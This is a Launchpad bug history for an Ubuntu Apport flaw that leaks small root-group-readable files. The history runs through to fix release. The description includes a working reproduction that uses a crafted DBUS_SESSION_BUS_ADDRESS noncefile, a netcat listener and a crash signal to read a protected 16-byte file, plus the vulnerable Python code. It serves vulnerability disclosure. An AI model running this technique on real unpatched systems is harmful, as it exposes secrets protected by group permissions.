2020-06-29 21:26:10 |
Steve Beattie |
bug |
|
|
added bug |
2020-06-29 21:29:25 |
Steve Beattie |
description |
Fill me in |
-- VULNERABILITY DETAILS ------------------------
* Version tested:18.04.4 LTS amd64 server
* Installer file:ubuntu-18.04.4-live-server-amd64.iso
* Platform tested:-
---
### Analysis
Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is in a closing user session. Before executing the binary, it drop privilege to crashed process's uid. But it doesn't drop group id, so it can be used to leak file which is owned by root group.
It leads to anyone can read the file which can only be read by root group, but the file size must be 16bytes.
reproduce step
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH
zdi@ubuntu:/tmp$
```
~~~C++
orig_uid = os.geteuid()
os.setresuid(-1, os.getuid(), -1) <-- did not set gid
try:
gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',
'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
(out, err) = gdbus.communicate()
if err:
error_log('gdbus call error: ' + err.decode('UTF-8'))
except OSError as e:
error_log('gdbus call failed, cannot determine running session: ' + str(e))
return False
finally:
os.setresuid(-1, orig_uid, -1)
~~~
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative |
|
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Eoan |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Eoan) |
|
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Xenial |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Xenial) |
|
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Focal |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Focal) |
|
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Bionic |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Bionic) |
|
2020-06-29 21:56:12 |
Steve Beattie |
apport (Ubuntu Focal): status |
New |
Confirmed |
|
2020-06-29 21:56:19 |
Steve Beattie |
apport (Ubuntu Focal): importance |
Undecided |
Medium |
|
2020-06-29 21:56:22 |
Steve Beattie |
apport (Ubuntu Eoan): importance |
Undecided |
Medium |
|
2020-06-29 21:56:24 |
Steve Beattie |
apport (Ubuntu Bionic): importance |
Undecided |
Medium |
|
2020-06-29 21:56:27 |
Steve Beattie |
apport (Ubuntu Xenial): importance |
Undecided |
Medium |
|
2020-06-29 21:56:30 |
Steve Beattie |
apport (Ubuntu): importance |
Undecided |
Medium |
|
2020-06-30 00:02:47 |
Steve Beattie |
apport (Ubuntu Xenial): status |
New |
Confirmed |
|
2020-06-30 00:02:50 |
Steve Beattie |
apport (Ubuntu Bionic): status |
New |
Confirmed |
|
2020-06-30 00:02:54 |
Steve Beattie |
apport (Ubuntu Eoan): status |
New |
Confirmed |
|
2020-06-30 06:37:12 |
Steve Beattie |
cve linked |
|
2020-11936 |
|
2020-08-04 16:58:15 |
Launchpad Janitor |
apport (Ubuntu Focal): status |
Confirmed |
Fix Released |
|
2020-08-04 16:58:15 |
Launchpad Janitor |
cve linked |
|
2020-15701 |
|
2020-08-04 16:58:15 |
Launchpad Janitor |
cve linked |
|
2020-15702 |
|
2020-08-04 16:58:25 |
Launchpad Janitor |
apport (Ubuntu Xenial): status |
Confirmed |
Fix Released |
|
2020-08-04 17:08:33 |
Launchpad Janitor |
apport (Ubuntu Bionic): status |
Confirmed |
Fix Released |
|
2020-08-05 20:56:58 |
Launchpad Janitor |
branch linked |
|
lp:~ubuntu-core-dev/ubuntu/groovy/apport/ubuntu |
|
2020-08-07 16:15:18 |
Launchpad Janitor |
apport (Ubuntu): status |
New |
Fix Released |
|
2020-09-25 02:07:39 |
Seth Arnold |
information type |
Private Security |
Public Security |
|
2020-09-25 02:07:41 |
Seth Arnold |
bug |
|
|
added subscriber Ubuntu Bugs |
2022-05-10 12:34:48 |
Marc Deslauriers |
apport (Ubuntu Eoan): status |
Confirmed |
Won't Fix |
|
2022-06-27 10:28:13 |
Benjamin Drung |
bug task added |
|
apport |
|
2022-06-27 10:28:19 |
Benjamin Drung |
apport: status |
New |
Fix Released |
|
2022-06-27 10:28:20 |
Benjamin Drung |
apport: milestone |
|
2.21.0 |
|
2022-06-27 10:28:22 |
Benjamin Drung |
apport: importance |
Undecided |
Medium |
|